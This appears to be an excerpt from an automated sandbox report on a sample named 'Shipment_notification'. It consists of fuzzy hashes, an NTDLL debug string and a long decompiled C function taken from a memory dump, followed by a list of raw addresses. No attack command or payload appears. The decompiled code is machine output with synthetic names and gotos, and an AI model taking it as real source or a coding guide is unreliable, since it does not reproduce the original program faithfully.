                                                                                Uniqueness Score: -1.00%

                                                                                Strings
                                                                                • NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p, xrefs: 01B7FF60
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.378214888.0000000001AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AC0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_1ac0000_Shipment_notification.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p
                                                                                • API String ID: 0-1911121157
                                                                                • Opcode ID: 8af52df88c02015b42798fbb3ab42b865ad4d665d339bac69228e1e7784672b3
                                                                                • Instruction ID: a41d7be63ee883291e12f455cc92425b2c13e4013414294dd4f266fb7f3af988
                                                                                • Opcode Fuzzy Hash: 8af52df88c02015b42798fbb3ab42b865ad4d665d339bac69228e1e7784672b3
                                                                                • Instruction Fuzzy Hash: 3C110471911544EFDF2EEB54C988FA8BBB1FF08714F5480D8E1145B161CB389950CB90
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 88%
                                                                                			E01BB5BA5(void* __ebx, signed char __ecx, signed int* __edx, void* __edi, void* __esi, void* __eflags) {
                                                                                				signed int _t296;
                                                                                				signed char _t298;
                                                                                				signed int _t301;
                                                                                				signed int _t306;
                                                                                				signed int _t310;
                                                                                				signed char _t311;
                                                                                				intOrPtr _t312;
                                                                                				signed int _t313;
                                                                                				void* _t327;
                                                                                				signed int _t328;
                                                                                				intOrPtr _t329;
                                                                                				intOrPtr _t333;
                                                                                				signed char _t334;
                                                                                				signed int _t336;
                                                                                				void* _t339;
                                                                                				signed int _t340;
                                                                                				signed int _t356;
                                                                                				signed int _t362;
                                                                                				short _t367;
                                                                                				short _t368;
                                                                                				short _t373;
                                                                                				signed int _t380;
                                                                                				void* _t382;
                                                                                				short _t385;
                                                                                				signed short _t392;
                                                                                				signed char _t393;
                                                                                				signed int _t395;
                                                                                				signed char _t397;
                                                                                				signed int _t398;
                                                                                				signed short _t402;
                                                                                				void* _t406;
                                                                                				signed int _t412;
                                                                                				signed char _t414;
                                                                                				signed short _t416;
                                                                                				signed int _t421;
                                                                                				signed char _t427;
                                                                                				intOrPtr _t434;
                                                                                				signed char _t435;
                                                                                				signed int _t436;
                                                                                				signed int _t442;
                                                                                				signed int _t446;
                                                                                				signed int _t447;
                                                                                				signed int _t451;
                                                                                				signed int _t453;
                                                                                				signed int _t454;
                                                                                				signed int _t455;
                                                                                				intOrPtr _t456;
                                                                                				intOrPtr* _t457;
                                                                                				short _t458;
                                                                                				signed short _t462;
                                                                                				signed int _t469;
                                                                                				intOrPtr* _t474;
                                                                                				signed int _t475;
                                                                                				signed int _t479;
                                                                                				signed int _t480;
                                                                                				signed int _t481;
                                                                                				short _t485;
                                                                                				signed int _t491;
                                                                                				signed int* _t494;
                                                                                				signed int _t498;
                                                                                				signed int _t505;
                                                                                				intOrPtr _t506;
                                                                                				signed short _t508;
                                                                                				signed int _t511;
                                                                                				void* _t517;
                                                                                				signed int _t519;
                                                                                				signed int _t522;
                                                                                				void* _t523;
                                                                                				signed int _t524;
                                                                                				void* _t528;
                                                                                				signed int _t529;
                                                                                
                                                                                				_push(0xd4);
                                                                                				_push(0x1bc1178);
                                                                                				E01B3D0E8(__ebx, __edi, __esi);
                                                                                				_t494 = __edx;
                                                                                				 *(_t528 - 0xcc) = __edx;
                                                                                				_t511 = __ecx;
                                                                                				 *((intOrPtr*)(_t528 - 0xb4)) = __ecx;
                                                                                				 *(_t528 - 0xbc) = __ecx;
                                                                                				 *((intOrPtr*)(_t528 - 0xc8)) =  *((intOrPtr*)(_t528 + 0x20));
                                                                                				_t434 =  *((intOrPtr*)(_t528 + 0x24));
                                                                                				 *((intOrPtr*)(_t528 - 0xc4)) = _t434;
                                                                                				_t427 = 0;
                                                                                				 *(_t528 - 0x74) = 0;
                                                                                				 *(_t528 - 0x9c) = 0;
                                                                                				 *(_t528 - 0x84) = 0;
                                                                                				 *(_t528 - 0xac) = 0;
                                                                                				 *(_t528 - 0x88) = 0;
                                                                                				 *(_t528 - 0xa8) = 0;
                                                                                				 *((intOrPtr*)(_t434 + 0x40)) = 0;
                                                                                				if( *(_t528 + 0x1c) <= 0x80) {
                                                                                					__eflags =  *(__ecx + 0xc0) & 0x00000004;
                                                                                					if(__eflags != 0) {
                                                                                						_t421 = E01BB4C56(0, __edx, __ecx, __eflags);
                                                                                						__eflags = _t421;
                                                                                						if(_t421 != 0) {
                                                                                							 *((intOrPtr*)(_t528 - 4)) = 0;
                                                                                							E01B2D000(0x410);
                                                                                							 *(_t528 - 0x18) = _t529;
                                                                                							 *(_t528 - 0x9c) = _t529;
                                                                                							 *((intOrPtr*)(_t528 - 4)) = 0xfffffffe;
                                                                                							E01BB5542(_t528 - 0x9c, _t528 - 0x84);
                                                                                						}
                                                                                					}
                                                                                					_t435 = _t427;
                                                                                					 *(_t528 - 0xd0) = _t435;
                                                                                					_t474 = _t511 + 0x65;
                                                                                					 *((intOrPtr*)(_t528 - 0x94)) = _t474;
                                                                                					_t511 = 0x18;
                                                                                					while(1) {
                                                                                						 *(_t528 - 0xa0) = _t427;
                                                                                						 *(_t528 - 0xbc) = _t427;
                                                                                						 *(_t528 - 0x80) = _t427;
                                                                                						 *(_t528 - 0x78) = 0x50;
                                                                                						 *(_t528 - 0x79) = _t427;
                                                                                						 *(_t528 - 0x7a) = _t427;
                                                                                						 *(_t528 - 0x8c) = _t427;
                                                                                						 *(_t528 - 0x98) = _t427;
                                                                                						 *(_t528 - 0x90) = _t427;
                                                                                						 *(_t528 - 0xb0) = _t427;
                                                                                						 *(_t528 - 0xb8) = _t427;
                                                                                						_t296 = 1 << _t435;
                                                                                						_t436 =  *(_t528 + 0xc) & 0x0000ffff;
                                                                                						__eflags = _t436 & _t296;
                                                                                						if((_t436 & _t296) != 0) {
                                                                                							goto L92;
                                                                                						}
                                                                                						__eflags =  *((char*)(_t474 - 1));
                                                                                						if( *((char*)(_t474 - 1)) == 0) {
                                                                                							goto L92;
                                                                                						}
                                                                                						_t301 =  *_t474;
                                                                                						__eflags = _t494[1] - _t301;
                                                                                						if(_t494[1] <= _t301) {
                                                                                							L10:
                                                                                							__eflags =  *(_t474 - 5) & 0x00000040;
                                                                                							if(( *(_t474 - 5) & 0x00000040) == 0) {
                                                                                								L12:
                                                                                								__eflags =  *(_t474 - 0xd) & _t494[2] |  *(_t474 - 9) & _t494[3];
                                                                                								if(( *(_t474 - 0xd) & _t494[2] |  *(_t474 - 9) & _t494[3]) == 0) {
                                                                                									goto L92;
                                                                                								}
                                                                                								_t442 =  *(_t474 - 0x11) & _t494[3];
                                                                                								__eflags = ( *(_t474 - 0x15) & _t494[2]) -  *(_t474 - 0x15);
                                                                                								if(( *(_t474 - 0x15) & _t494[2]) !=  *(_t474 - 0x15)) {
                                                                                									goto L92;
                                                                                								}
                                                                                								__eflags = _t442 -  *(_t474 - 0x11);
                                                                                								if(_t442 !=  *(_t474 - 0x11)) {
                                                                                									goto L92;
                                                                                								}
                                                                                								L15:
                                                                                								_t306 =  *(_t474 + 1) & 0x000000ff;
                                                                                								 *(_t528 - 0xc0) = _t306;
                                                                                								 *(_t528 - 0xa4) = _t306;
                                                                                								__eflags =  *0x1bd60e8;
                                                                                								if( *0x1bd60e8 != 0) {
                                                                                									__eflags = _t306 - 0x40;
                                                                                									if(_t306 < 0x40) {
                                                                                										L20:
                                                                                										asm("lock inc dword [eax]");
                                                                                										_t310 =  *0x1bd60e8; // 0x0
                                                                                										_t311 =  *(_t310 +  *(_t528 - 0xa4) * 8);
                                                                                										__eflags = _t311 & 0x00000001;
                                                                                										if((_t311 & 0x00000001) == 0) {
                                                                                											 *(_t528 - 0xa0) = _t311;
                                                                                											_t475 = _t427;
                                                                                											 *(_t528 - 0x74) = _t427;
                                                                                											__eflags = _t475;
                                                                                											if(_t475 != 0) {
                                                                                												L91:
                                                                                												_t474 =  *((intOrPtr*)(_t528 - 0x94));
                                                                                												goto L92;
                                                                                											}
                                                                                											asm("sbb edi, edi");
                                                                                											_t498 = ( ~( *(_t528 + 0x18)) & _t511) + 0x50;
                                                                                											_t511 = _t498;
                                                                                											_t312 =  *((intOrPtr*)(_t528 - 0x94));
                                                                                											__eflags =  *(_t312 - 5) & 1;
                                                                                											if(( *(_t312 - 5) & 1) != 0) {
                                                                                												_push(_t528 - 0x98);
                                                                                												_push(0x4c);
                                                                                												_push(_t528 - 0x70);
                                                                                												_push(1);
                                                                                												_push(0xfffffffa);
                                                                                												_t412 = E01B29710();
                                                                                												_t475 = _t427;
                                                                                												__eflags = _t412;
                                                                                												if(_t412 >= 0) {
                                                                                													_t414 =  *(_t528 - 0x98) - 8;
                                                                                													 *(_t528 - 0x98) = _t414;
                                                                                													_t416 = _t414 + 0x0000000f & 0x0000fff8;
                                                                                													 *(_t528 - 0x8c) = _t416;
                                                                                													 *(_t528 - 0x79) = 1;
                                                                                													_t511 = (_t416 & 0x0000ffff) + _t498;
                                                                                													__eflags = _t511;
                                                                                												}
                                                                                											}
                                                                                											_t446 =  *( *((intOrPtr*)(_t528 - 0x94)) - 5);
                                                                                											__eflags = _t446 & 0x00000004;
                                                                                											if((_t446 & 0x00000004) != 0) {
                                                                                												__eflags =  *(_t528 - 0x9c);
                                                                                												if( *(_t528 - 0x9c) != 0) {
                                                                                													 *(_t528 - 0x7a) = 1;
                                                                                													_t511 = _t511 + ( *(_t528 - 0x84) & 0x0000ffff);
                                                                                													__eflags = _t511;
                                                                                												}
                                                                                											}
                                                                                											_t313 = 2;
                                                                                											_t447 = _t446 & _t313;
                                                                                											__eflags = _t447;
                                                                                											 *(_t528 - 0xd4) = _t447;
                                                                                											if(_t447 != 0) {
                                                                                												_t406 = 0x10;
                                                                                												_t511 = _t511 + _t406;
                                                                                												__eflags = _t511;
                                                                                											}
                                                                                											_t494 = ( *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) << 4) +  *((intOrPtr*)(_t528 - 0xc4));
                                                                                											 *(_t528 - 0x88) = _t427;
                                                                                											__eflags =  *(_t528 + 0x1c);
                                                                                											if( *(_t528 + 0x1c) <= 0) {
                                                                                												L45:
                                                                                												__eflags =  *(_t528 - 0xb0);
                                                                                												if( *(_t528 - 0xb0) != 0) {
                                                                                													_t511 = _t511 + (( *(_t528 - 0x90) & 0x0000ffff) + 0x0000000f & 0xfffffff8);
                                                                                													__eflags = _t511;
                                                                                												}
                                                                                												__eflags = _t475;
                                                                                												if(_t475 != 0) {
                                                                                													asm("lock dec dword [ecx+edx*8+0x4]");
                                                                                													goto L100;
                                                                                												} else {
                                                                                													_t494[3] = _t511;
                                                                                													_t451 =  *(_t528 - 0xa0);
                                                                                													_t427 = E01B26DE6(_t451, _t511,  *( *[fs:0x18] + 0xf77) & 0x000000ff, _t528 - 0xe0, _t528 - 0xbc);
                                                                                													 *(_t528 - 0x88) = _t427;
                                                                                													__eflags = _t427;
                                                                                													if(_t427 == 0) {
                                                                                														__eflags = _t511 - 0xfff8;
                                                                                														if(_t511 <= 0xfff8) {
                                                                                															__eflags =  *((intOrPtr*)( *(_t528 - 0xa0) + 0x90)) - _t511;
                                                                                															asm("sbb ecx, ecx");
                                                                                															__eflags = (_t451 & 0x000000e2) + 8;
                                                                                														}
                                                                                														asm("lock dec dword [eax+edx*8+0x4]");
                                                                                														L100:
                                                                                														goto L101;
                                                                                													}
                                                                                													_t453 =  *(_t528 - 0xa0);
                                                                                													 *_t494 = _t453;
                                                                                													_t494[1] = _t427;
                                                                                													_t494[2] =  *(_t528 - 0xbc);
                                                                                													 *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) =  *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) + 1;
                                                                                													 *_t427 =  *(_t453 + 0x24) | _t511;
                                                                                													 *(_t427 + 4) =  *((intOrPtr*)(_t528 + 0x10));
                                                                                													 *((short*)(_t427 + 6)) =  *((intOrPtr*)(_t528 + 8));
                                                                                													asm("movsd");
                                                                                													asm("movsd");
                                                                                													asm("movsd");
                                                                                													asm("movsd");
                                                                                													asm("movsd");
                                                                                													asm("movsd");
                                                                                													asm("movsd");
                                                                                													asm("movsd");
                                                                                													__eflags =  *(_t528 + 0x14);
                                                                                													if( *(_t528 + 0x14) == 0) {
                                                                                														__eflags =  *[fs:0x18] + 0xf50;
                                                                                													}
                                                                                													asm("movsd");
                                                                                													asm("movsd");
                                                                                													asm("movsd");
                                                                                													asm("movsd");
                                                                                													__eflags =  *(_t528 + 0x18);
                                                                                													if( *(_t528 + 0x18) == 0) {
                                                                                														_t454 =  *(_t528 - 0x80);
                                                                                														_t479 =  *(_t528 - 0x78);
                                                                                														_t327 = 1;
                                                                                														__eflags = 1;
                                                                                													} else {
                                                                                														_t146 = _t427 + 0x50; // 0x50
                                                                                														_t454 = _t146;
                                                                                														 *(_t528 - 0x80) = _t454;
                                                                                														_t382 = 0x18;
                                                                                														 *_t454 = _t382;
                                                                                														 *((short*)(_t454 + 2)) = 1;
                                                                                														_t385 = 0x10;
                                                                                														 *((short*)(_t454 + 6)) = _t385;
                                                                                														 *(_t454 + 4) = 0;
                                                                                														asm("movsd");
                                                                                														asm("movsd");
                                                                                														asm("movsd");
                                                                                														asm("movsd");
                                                                                														_t327 = 1;
                                                                                														 *(_t427 + 4) =  *(_t427 + 4) | 1;
                                                                                														_t479 = 0x68;
                                                                                														 *(_t528 - 0x78) = _t479;
                                                                                													}
                                                                                													__eflags =  *(_t528 - 0x79) - _t327;
                                                                                													if( *(_t528 - 0x79) == _t327) {
                                                                                														_t524 = _t479 + _t427;
                                                                                														_t508 =  *(_t528 - 0x8c);
                                                                                														 *_t524 = _t508;
                                                                                														_t373 = 2;
                                                                                														 *((short*)(_t524 + 2)) = _t373;
                                                                                														 *((short*)(_t524 + 6)) =  *(_t528 - 0x98);
                                                                                														 *((short*)(_t524 + 4)) = 0;
                                                                                														_t167 = _t524 + 8; // 0x8
                                                                                														E01B2F3E0(_t167, _t528 - 0x68,  *(_t528 - 0x98));
                                                                                														_t529 = _t529 + 0xc;
                                                                                														 *(_t427 + 4) =  *(_t427 + 4) | 1;
                                                                                														_t479 =  *(_t528 - 0x78) + (_t508 & 0x0000ffff);
                                                                                														 *(_t528 - 0x78) = _t479;
                                                                                														_t380 =  *(_t528 - 0x80);
                                                                                														__eflags = _t380;
                                                                                														if(_t380 != 0) {
                                                                                															_t173 = _t380 + 4;
                                                                                															 *_t173 =  *(_t380 + 4) | 1;
                                                                                															__eflags =  *_t173;
                                                                                														}
                                                                                														_t454 = _t524;
                                                                                														 *(_t528 - 0x80) = _t454;
                                                                                														_t327 = 1;
                                                                                														__eflags = 1;
                                                                                													}
                                                                                													__eflags =  *(_t528 - 0xd4);
                                                                                													if( *(_t528 - 0xd4) == 0) {
                                                                                														_t505 =  *(_t528 - 0x80);
                                                                                													} else {
                                                                                														_t505 = _t479 + _t427;
                                                                                														_t523 = 0x10;
                                                                                														 *_t505 = _t523;
                                                                                														_t367 = 3;
                                                                                														 *((short*)(_t505 + 2)) = _t367;
                                                                                														_t368 = 4;
                                                                                														 *((short*)(_t505 + 6)) = _t368;
                                                                                														 *(_t505 + 4) = 0;
                                                                                														 *((intOrPtr*)(_t505 + 8)) =  *((intOrPtr*)( *[fs:0x30] + 0x1d4));
                                                                                														_t327 = 1;
                                                                                														 *(_t427 + 4) =  *(_t427 + 4) | 1;
                                                                                														_t479 = _t479 + _t523;
                                                                                														 *(_t528 - 0x78) = _t479;
                                                                                														__eflags = _t454;
                                                                                														if(_t454 != 0) {
                                                                                															_t186 = _t454 + 4;
                                                                                															 *_t186 =  *(_t454 + 4) | 1;
                                                                                															__eflags =  *_t186;
                                                                                														}
                                                                                														 *(_t528 - 0x80) = _t505;
                                                                                													}
                                                                                													__eflags =  *(_t528 - 0x7a) - _t327;
                                                                                													if( *(_t528 - 0x7a) == _t327) {
                                                                                														 *(_t528 - 0xd4) = _t479 + _t427;
                                                                                														_t522 =  *(_t528 - 0x84) & 0x0000ffff;
                                                                                														E01B2F3E0(_t479 + _t427,  *(_t528 - 0x9c), _t522);
                                                                                														_t529 = _t529 + 0xc;
                                                                                														 *(_t427 + 4) =  *(_t427 + 4) | 1;
                                                                                														_t479 =  *(_t528 - 0x78) + _t522;
                                                                                														 *(_t528 - 0x78) = _t479;
                                                                                														__eflags = _t505;
                                                                                														if(_t505 != 0) {
                                                                                															_t199 = _t505 + 4;
                                                                                															 *_t199 =  *(_t505 + 4) | 1;
                                                                                															__eflags =  *_t199;
                                                                                														}
                                                                                														_t505 =  *(_t528 - 0xd4);
                                                                                														 *(_t528 - 0x80) = _t505;
                                                                                													}
                                                                                													__eflags =  *(_t528 - 0xa8);
                                                                                													if( *(_t528 - 0xa8) != 0) {
                                                                                														_t356 = _t479 + _t427;
                                                                                														 *(_t528 - 0xd4) = _t356;
                                                                                														_t462 =  *(_t528 - 0xac);
                                                                                														 *_t356 = _t462 + 0x0000000f & 0x0000fff8;
                                                                                														_t485 = 0xc;
                                                                                														 *((short*)(_t356 + 2)) = _t485;
                                                                                														 *(_t356 + 6) = _t462;
                                                                                														 *((short*)(_t356 + 4)) = 0;
                                                                                														_t211 = _t356 + 8; // 0x9
                                                                                														E01B2F3E0(_t211,  *(_t528 - 0xa8), _t462 & 0x0000ffff);
                                                                                														E01B2FA60((_t462 & 0x0000ffff) + _t211, 0, (_t462 + 0x0000000f & 0x0000fff8) -  *(_t528 - 0xac) - 0x00000008 & 0x0000ffff);
                                                                                														_t529 = _t529 + 0x18;
                                                                                														_t427 =  *(_t528 - 0x88);
                                                                                														 *(_t427 + 4) =  *(_t427 + 4) | 1;
                                                                                														_t505 =  *(_t528 - 0xd4);
                                                                                														_t479 =  *(_t528 - 0x78) + ( *_t505 & 0x0000ffff);
                                                                                														 *(_t528 - 0x78) = _t479;
                                                                                														_t362 =  *(_t528 - 0x80);
                                                                                														__eflags = _t362;
                                                                                														if(_t362 != 0) {
                                                                                															_t222 = _t362 + 4;
                                                                                															 *_t222 =  *(_t362 + 4) | 1;
                                                                                															__eflags =  *_t222;
                                                                                														}
                                                                                													}
                                                                                													__eflags =  *(_t528 - 0xb0);
                                                                                													if( *(_t528 - 0xb0) != 0) {
                                                                                														 *(_t479 + _t427) =  *(_t528 - 0x90) + 0x0000000f & 0x0000fff8;
                                                                                														_t458 = 0xb;
                                                                                														 *((short*)(_t479 + _t427 + 2)) = _t458;
                                                                                														 *((short*)(_t479 + _t427 + 6)) =  *(_t528 - 0x90);
                                                                                														 *((short*)(_t427 + 4 + _t479)) = 0;
                                                                                														 *(_t528 - 0xb8) = _t479 + 8 + _t427;
                                                                                														E01B2FA60(( *(_t528 - 0x90) & 0x0000ffff) + _t479 + 8 + _t427, 0, ( *(_t528 - 0x90) + 0x0000000f & 0x0000fff8) -  *(_t528 - 0x90) - 0x00000008 & 0x0000ffff);
                                                                                														_t529 = _t529 + 0xc;
                                                                                														 *(_t427 + 4) =  *(_t427 + 4) | 1;
                                                                                														_t479 =  *(_t528 - 0x78) + ( *( *(_t528 - 0x78) + _t427) & 0x0000ffff);
                                                                                														 *(_t528 - 0x78) = _t479;
                                                                                														__eflags = _t505;
                                                                                														if(_t505 != 0) {
                                                                                															_t241 = _t505 + 4;
                                                                                															 *_t241 =  *(_t505 + 4) | 1;
                                                                                															__eflags =  *_t241;
                                                                                														}
                                                                                													}
                                                                                													_t328 =  *(_t528 + 0x1c);
                                                                                													__eflags = _t328;
                                                                                													if(_t328 == 0) {
                                                                                														L87:
                                                                                														_t329 =  *((intOrPtr*)(_t528 - 0xe0));
                                                                                														 *((intOrPtr*)(_t427 + 0x10)) = _t329;
                                                                                														_t455 =  *(_t528 - 0xdc);
                                                                                														 *(_t427 + 0x14) = _t455;
                                                                                														_t480 =  *(_t528 - 0xa0);
                                                                                														_t517 = 3;
                                                                                														__eflags =  *((intOrPtr*)(_t480 + 0x10)) - _t517;
                                                                                														if( *((intOrPtr*)(_t480 + 0x10)) != _t517) {
                                                                                															asm("rdtsc");
                                                                                															 *(_t427 + 0x3c) = _t480;
                                                                                														} else {
                                                                                															 *(_t427 + 0x3c) = _t455;
                                                                                														}
                                                                                														 *((intOrPtr*)(_t427 + 0x38)) = _t329;
                                                                                														_t456 =  *[fs:0x18];
                                                                                														 *((intOrPtr*)(_t427 + 8)) =  *((intOrPtr*)(_t456 + 0x24));
                                                                                														 *((intOrPtr*)(_t427 + 0xc)) =  *((intOrPtr*)(_t456 + 0x20));
                                                                                														_t427 = 0;
                                                                                														__eflags = 0;
                                                                                														_t511 = 0x18;
                                                                                														goto L91;
                                                                                													} else {
                                                                                														_t519 =  *((intOrPtr*)(_t528 - 0xc8)) + 0xc;
                                                                                														__eflags = _t519;
                                                                                														 *(_t528 - 0x8c) = _t328;
                                                                                														do {
                                                                                															_t506 =  *((intOrPtr*)(_t519 - 4));
                                                                                															_t457 =  *((intOrPtr*)(_t519 - 0xc));
                                                                                															 *(_t528 - 0xd4) =  *(_t519 - 8);
                                                                                															_t333 =  *((intOrPtr*)(_t528 - 0xb4));
                                                                                															__eflags =  *(_t333 + 0x36) & 0x00004000;
                                                                                															if(( *(_t333 + 0x36) & 0x00004000) != 0) {
                                                                                																_t334 =  *_t519;
                                                                                															} else {
                                                                                																_t334 = 0;
                                                                                															}
                                                                                															_t336 = _t334 & 0x000000ff;
                                                                                															__eflags = _t336;
                                                                                															_t427 =  *(_t528 - 0x88);
                                                                                															if(_t336 == 0) {
                                                                                																_t481 = _t479 + _t506;
                                                                                																__eflags = _t481;
                                                                                																 *(_t528 - 0x78) = _t481;
                                                                                																E01B2F3E0(_t479 + _t427, _t457, _t506);
                                                                                																_t529 = _t529 + 0xc;
                                                                                															} else {
                                                                                																_t340 = _t336 - 1;
                                                                                																__eflags = _t340;
                                                                                																if(_t340 == 0) {
                                                                                																	E01B2F3E0( *(_t528 - 0xb8), _t457, _t506);
                                                                                																	_t529 = _t529 + 0xc;
                                                                                																	 *(_t528 - 0xb8) =  *(_t528 - 0xb8) + _t506;
                                                                                																} else {
                                                                                																	__eflags = _t340 == 0;
                                                                                																	if(_t340 == 0) {
                                                                                																		__eflags = _t506 - 8;
                                                                                																		if(_t506 == 8) {
                                                                                																			 *((intOrPtr*)(_t528 - 0xe0)) =  *_t457;
                                                                                																			 *(_t528 - 0xdc) =  *(_t457 + 4);
                                                                                																		}
                                                                                																	}
                                                                                																}
                                                                                															}
                                                                                															_t339 = 0x10;
                                                                                															_t519 = _t519 + _t339;
                                                                                															_t263 = _t528 - 0x8c;
                                                                                															 *_t263 =  *(_t528 - 0x8c) - 1;
                                                                                															__eflags =  *_t263;
                                                                                															_t479 =  *(_t528 - 0x78);
                                                                                														} while ( *_t263 != 0);
                                                                                														goto L87;
                                                                                													}
                                                                                												}
                                                                                											} else {
                                                                                												_t392 =  *( *((intOrPtr*)(_t528 - 0xb4)) + 0x36) & 0x00004000;
                                                                                												 *(_t528 - 0xa2) = _t392;
                                                                                												_t469 =  *((intOrPtr*)(_t528 - 0xc8)) + 8;
                                                                                												__eflags = _t469;
                                                                                												while(1) {
                                                                                													 *(_t528 - 0xe4) = _t511;
                                                                                													__eflags = _t392;
                                                                                													_t393 = _t427;
                                                                                													if(_t392 != 0) {
                                                                                														_t393 =  *((intOrPtr*)(_t469 + 4));
                                                                                													}
                                                                                													_t395 = (_t393 & 0x000000ff) - _t427;
                                                                                													__eflags = _t395;
                                                                                													if(_t395 == 0) {
                                                                                														_t511 = _t511 +  *_t469;
                                                                                														__eflags = _t511;
                                                                                													} else {
                                                                                														_t398 = _t395 - 1;
                                                                                														__eflags = _t398;
                                                                                														if(_t398 == 0) {
                                                                                															 *(_t528 - 0x90) =  *(_t528 - 0x90) +  *_t469;
                                                                                															 *(_t528 - 0xb0) =  *(_t528 - 0xb0) + 1;
                                                                                														} else {
                                                                                															__eflags = _t398 == 1;
                                                                                															if(_t398 == 1) {
                                                                                																 *(_t528 - 0xa8) =  *(_t469 - 8);
                                                                                																_t402 =  *_t469 & 0x0000ffff;
                                                                                																 *(_t528 - 0xac) = _t402;
                                                                                																_t511 = _t511 + ((_t402 & 0x0000ffff) + 0x0000000f & 0xfffffff8);
                                                                                															}
                                                                                														}
                                                                                													}
                                                                                													__eflags = _t511 -  *(_t528 - 0xe4);
                                                                                													if(_t511 <  *(_t528 - 0xe4)) {
                                                                                														break;
                                                                                													}
                                                                                													_t397 =  *(_t528 - 0x88) + 1;
                                                                                													 *(_t528 - 0x88) = _t397;
                                                                                													_t469 = _t469 + 0x10;
                                                                                													__eflags = _t397 -  *(_t528 + 0x1c);
                                                                                													_t392 =  *(_t528 - 0xa2);
                                                                                													if(_t397 <  *(_t528 + 0x1c)) {
                                                                                														continue;
                                                                                													}
                                                                                													goto L45;
                                                                                												}
                                                                                												_t475 = 0x216;
                                                                                												 *(_t528 - 0x74) = 0x216;
                                                                                												goto L45;
                                                                                											}
                                                                                										} else {
                                                                                											asm("lock dec dword [eax+ecx*8+0x4]");
                                                                                											goto L16;
                                                                                										}
                                                                                									}
                                                                                									_t491 = E01BB4CAB(_t306, _t528 - 0xa4);
                                                                                									 *(_t528 - 0x74) = _t491;
                                                                                									__eflags = _t491;
                                                                                									if(_t491 != 0) {
                                                                                										goto L91;
                                                                                									} else {
                                                                                										_t474 =  *((intOrPtr*)(_t528 - 0x94));
                                                                                										goto L20;
                                                                                									}
                                                                                								}
                                                                                								L16:
                                                                                								 *(_t528 - 0x74) = 0x1069;
                                                                                								L93:
                                                                                								_t298 =  *(_t528 - 0xd0) + 1;
                                                                                								 *(_t528 - 0xd0) = _t298;
                                                                                								_t474 = _t474 + _t511;
                                                                                								 *((intOrPtr*)(_t528 - 0x94)) = _t474;
                                                                                								_t494 = 4;
                                                                                								__eflags = _t298 - _t494;
                                                                                								if(_t298 >= _t494) {
                                                                                									goto L100;
                                                                                								}
                                                                                								_t494 =  *(_t528 - 0xcc);
                                                                                								_t435 = _t298;
                                                                                								continue;
                                                                                							}
                                                                                							__eflags = _t494[2] | _t494[3];
                                                                                							if((_t494[2] | _t494[3]) == 0) {
                                                                                								goto L15;
                                                                                							}
                                                                                							goto L12;
                                                                                						}
                                                                                						__eflags = _t301;
                                                                                						if(_t301 != 0) {
                                                                                							goto L92;
                                                                                						}
                                                                                						goto L10;
                                                                                						L92:
                                                                                						goto L93;
                                                                                					}
                                                                                				} else {
                                                                                					_push(0x57);
                                                                                					L101:
                                                                                					return E01B3D130(_t427, _t494, _t511);
                                                                                				}
                                                                                			}

                                                                                0x01bb6275
                                                                                0x01bb6275
                                                                                0x01bb6278
                                                                                0x01bb627e
                                                                                0x01bb627e
                                                                                0x01bb6281
                                                                                0x01bb6287
                                                                                0x01bb628d
                                                                                0x01bb6298
                                                                                0x01bb629c
                                                                                0x01bb62a2
                                                                                0x01bb629e
                                                                                0x01bb629e
                                                                                0x01bb629e
                                                                                0x01bb62a7
                                                                                0x01bb62a7
                                                                                0x01bb62aa
                                                                                0x01bb62b0
                                                                                0x01bb62f0
                                                                                0x01bb62f0
                                                                                0x01bb62f2
                                                                                0x01bb62f8
                                                                                0x01bb62fd
                                                                                0x01bb62b2
                                                                                0x01bb62b2
                                                                                0x01bb62b2
                                                                                0x01bb62b5
                                                                                0x01bb62dd
                                                                                0x01bb62e2
                                                                                0x01bb62e5
                                                                                0x01bb62b7
                                                                                0x01bb62b8
                                                                                0x01bb62bb
                                                                                0x01bb62bd
                                                                                0x01bb62c0
                                                                                0x01bb62c4
                                                                                0x01bb62cd
                                                                                0x01bb62cd
                                                                                0x01bb62c0
                                                                                0x01bb62bb
                                                                                0x01bb62b5
                                                                                0x01bb6302
                                                                                0x01bb6303
                                                                                0x01bb6305
                                                                                0x01bb6305
                                                                                0x01bb6305
                                                                                0x01bb630c
                                                                                0x01bb630c
                                                                                0x00000000
                                                                                0x01bb627e
                                                                                0x01bb6269
                                                                                0x01bb5eac
                                                                                0x01bb5ebb
                                                                                0x01bb5ebe
                                                                                0x01bb5ecb
                                                                                0x01bb5ecb
                                                                                0x01bb5ece
                                                                                0x01bb5ece
                                                                                0x01bb5ed4
                                                                                0x01bb5ed7
                                                                                0x01bb5ed9
                                                                                0x01bb5edb
                                                                                0x01bb5edb
                                                                                0x01bb5ee1
                                                                                0x01bb5ee1
                                                                                0x01bb5ee3
                                                                                0x01bb5f20
                                                                                0x01bb5f20
                                                                                0x01bb5ee5
                                                                                0x01bb5ee5
                                                                                0x01bb5ee5
                                                                                0x01bb5ee8
                                                                                0x01bb5f11
                                                                                0x01bb5f18
                                                                                0x01bb5eea
                                                                                0x01bb5eea
                                                                                0x01bb5eed
                                                                                0x01bb5ef2
                                                                                0x01bb5ef8
                                                                                0x01bb5efb
                                                                                0x01bb5f0a
                                                                                0x01bb5f0a
                                                                                0x01bb5eed
                                                                                0x01bb5ee8
                                                                                0x01bb5f22
                                                                                0x01bb5f28
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x01bb5f30
                                                                                0x01bb5f31
                                                                                0x01bb5f37
                                                                                0x01bb5f3a
                                                                                0x01bb5f3d
                                                                                0x01bb5f44
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x01bb5f46
                                                                                0x01bb5f48
                                                                                0x01bb5f4d
                                                                                0x00000000
                                                                                0x01bb5f4d
                                                                                0x01bb5dda
                                                                                0x01bb5ddf
                                                                                0x00000000
                                                                                0x01bb5ddf
                                                                                0x01bb5dd8
                                                                                0x01bb5da7
                                                                                0x01bb5da9
                                                                                0x01bb5dac
                                                                                0x01bb5dae
